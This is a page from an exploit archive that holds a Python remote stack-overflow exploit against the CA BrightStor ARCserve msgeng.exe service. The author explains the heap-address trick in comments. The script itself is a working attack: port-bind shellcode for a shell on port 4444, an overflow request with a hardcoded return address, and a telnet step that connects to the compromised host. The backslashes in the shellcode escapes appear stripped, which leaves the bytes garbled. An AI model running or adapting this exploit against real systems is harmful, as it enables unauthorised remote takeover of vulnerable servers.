[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : CA BrightStor ARCserve (msgeng.exe) Remote Stack Overflow Exploit
# Published : 2007-03-16
# Author : Winny Thomas
# Previous Title : Mercur Messaging 2005 <= SP4 IMAP Remote Exploit (egghunter mod)
# Next Title : ActSoft DVD-Tools (dvdtools.ocx 3.8.5.0) Stack Overflow Exploit
#!/usr/bin/python
# This one was listed in the SANS TOP 20 and I needed an exploit for analysis.
# I couldnt find a reliable exploit for my analysis and so came up with this.
# Remote exploit for the CA BrightStor msgeng.exe service stack overflow
# vulnerability as described in LS-20060330.pdf on lssec.com. The exploit was
# tested on windows 2000 SP4 in a VMware environment.
# Opens a shell on TCP port 4444.
#
# Though a stack overflow vulnerability caused due to strcpy, this vulnerability
# provides an interesting case. Unlike a traditional stack overflow where the
# user supplies the overflow data which immediately is copied into a stack
# based buffer, here the user supplied data is stored in the heap and the first
# DWORD of the RPC stub is used as the source address in the strcpy operation.
# This means we have to locate the address of our shellcode on the heap and then
# craft the first DWORD of the stub in such a way that when strcpy is called our
# buffer is the source. I had problems locating the shellcode in the heap,
# because each time I ran the exploit the shellcode would be in different places
# , obviously (0008xxxx or 0009xxxx or 000Axxxx). However when sending very
# large data of around 500000 bytes I saw that along with one of the likely
# locations it was always available at the address 011E0070 aswell. Atleast on
# the setup I have for analysis this address does not have anything useful if
# buffer sizes of 1k, 2k etc are used. Once we get the address straight, there
# after its a straight forward stack overflow that can overwrite EIP.
#
# This exploit binds shell to TCP port 4444 and connects to it
#
# Author shall bear no responsibility for any screw ups caused by using the code
# Winny M Thomas ;-)
from impacket.dcerpc import transport, dcerpc
from impacket import uuid
import struct
import time
import sys
import os
#alphanumeric portbind shellcode from metasploit. Binds shell to port 4444
shellcode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
shellcode += "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
shellcode += "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
shellcode += "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
shellcode += "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e"
shellcode += "x4dx34x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx58"
shellcode += "x4ex56x46x42x46x42x4bx58x45x54x4ex53x4bx48x4ex57"
shellcode += "x45x30x4ax47x41x30x4fx4ex4bx48x4fx44x4ax51x4bx38"
shellcode += "x4fx55x42x32x41x50x4bx4ex49x44x4bx58x46x33x4bx58"
shellcode += "x41x30x50x4ex41x43x42x4cx49x49x4ex4ax46x48x42x4c"
shellcode += "x46x37x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
shellcode += "x46x4fx4bx53x46x35x46x52x4ax42x45x57x45x4ex4bx48"
shellcode += "x4fx45x46x52x41x30x4bx4ex48x46x4bx38x4ex50x4bx54"
shellcode += "x4bx48x4fx45x4ex41x41x30x4bx4ex43x30x4ex32x4bx58"
shellcode += "x49x48x4ex36x46x42x4ex41x41x56x43x4cx41x53x4bx4d"
shellcode += "x46x56x4bx38x43x54x42x43x4bx58x42x44x4ex30x4bx38"
shellcode += "x42x47x4ex41x4dx4ax4bx58x42x44x4ax30x50x55x4ax56"
shellcode += "x50x48x50x34x50x30x4ex4ex42x45x4fx4fx48x4dx48x36"
shellcode += "x43x45x48x56x4ax46x43x53x44x33x4ax46x47x37x43x57"
shellcode += "x44x33x4fx35x46x35x4fx4fx42x4dx4ax36x4bx4cx4dx4e"
shellcode += "x4ex4fx4bx53x42x45x4fx4fx48x4dx4fx35x49x38x45x4e"
shellcode += "x48x46x41x58x4dx4ex4ax30x44x30x45x35x4cx36x44x30"
shellcode += "x4fx4fx42x4dx4ax46x49x4dx49x50x45x4fx4dx4ax47x35"
shellcode += "x4fx4fx48x4dx43x35x43x45x43x55x43x45x43x35x43x34"
shellcode += "x43x55x43x34x43x45x4fx4fx42x4dx48x46x4ax36x41x41"
shellcode += "x4ex45x48x36x43x45x49x58x41x4ex45x39x4ax56x46x4a"
shellcode += "x4cx31x42x37x47x4cx47x45x4fx4fx48x4dx4cx46x42x31"
shellcode += "x41x55x45x55x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x42"
shellcode += "x49x4ex47x45x4fx4fx48x4dx43x55x45x35x4fx4fx42x4d"
shellcode += "x4ax36x45x4ex49x54x48x58x49x44x47x55x4fx4fx48x4d"
shellcode += "x42x55x46x35x46x35x45x35x4fx4fx42x4dx43x39x4ax56"
shellcode += "x47x4ex49x47x48x4cx49x37x47x45x4fx4fx48x4dx45x45"
shellcode += "x4fx4fx42x4dx48x46x4cx36x46x56x48x36x4ax46x43x46"
shellcode += "x4dx46x49x58x45x4ex4cx56x42x35x49x55x49x52x4ex4c"
shellcode += "x49x38x47x4ex4cx56x46x54x49x58x44x4ex41x53x42x4c"
shellcode += "x43x4fx4cx4ax50x4fx44x54x4dx52x50x4fx44x34x4ex32"
shellcode += "x43x49x4dx48x4cx47x4ax33x4bx4ax4bx4ax4bx4ax4ax36"
shellcode += "x44x47x50x4fx43x4bx48x41x4fx4fx45x57x46x34x4fx4f"
shellcode += "x48x4dx4bx45x47x55x44x55x41x45x41x35x41x55x4cx36"
shellcode += "x41x30x41x35x41x55x45x45x41x45x4fx4fx42x4dx4ax56"
shellcode += "x4dx4ax49x4dx45x30x50x4cx43x35x4fx4fx48x4dx4cx56"
shellcode += "x4fx4fx4fx4fx47x33x4fx4fx42x4dx4bx38x47x55x4ex4f"
shellcode += "x43x48x46x4cx46x36x4fx4fx48x4dx44x55x4fx4fx42x4d"
shellcode += "x4ax46x42x4fx4cx48x46x50x4fx45x43x55x4fx4fx48x4d"
shellcode += "x4fx4fx42x4dx5ax90x90x90x90x90x90x90x90x90x90x90"
def DCEconnectAndExploit(target):
trans = transport.TCPTransport(target, 6503)
trans.connect()
dce = dcerpc.DCERPC_v5(trans)
dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))
# The following DWORD gets converted to an address pointing into our
# buffer.
request = struct.pack('<L', 0x00003A7C)
request += "A" * 19608
request += "x90x90xebx06"
# At the point of overflow EBX points to our shellcode
# Address of 'call ebx' from kernel32.dll SP4
request += struct.pack('<L', 0x7C577B03)
request += "x90x90x90x90"
request += shellcode
request += "b" * 480000
dce.call(45, request)
def ConnectRemoteShell(target):
connect = "/usr/bin/telnet " + target + " 4444"
os.system(connect)
if __name__ == '__main__':
try:
target = sys.argv[1]
except IndexError:
print 'Usage: %s <target ip>n' % sys.argv[0]
sys.exit(-1)
DCEconnectAndExploit(target)
print 'Exploit sent to: %s' % target
print 'Connecting to %s:4444' % target
time.sleep(3)
ConnectRemoteShell(target)
# www.Syue.com [2007-03-16]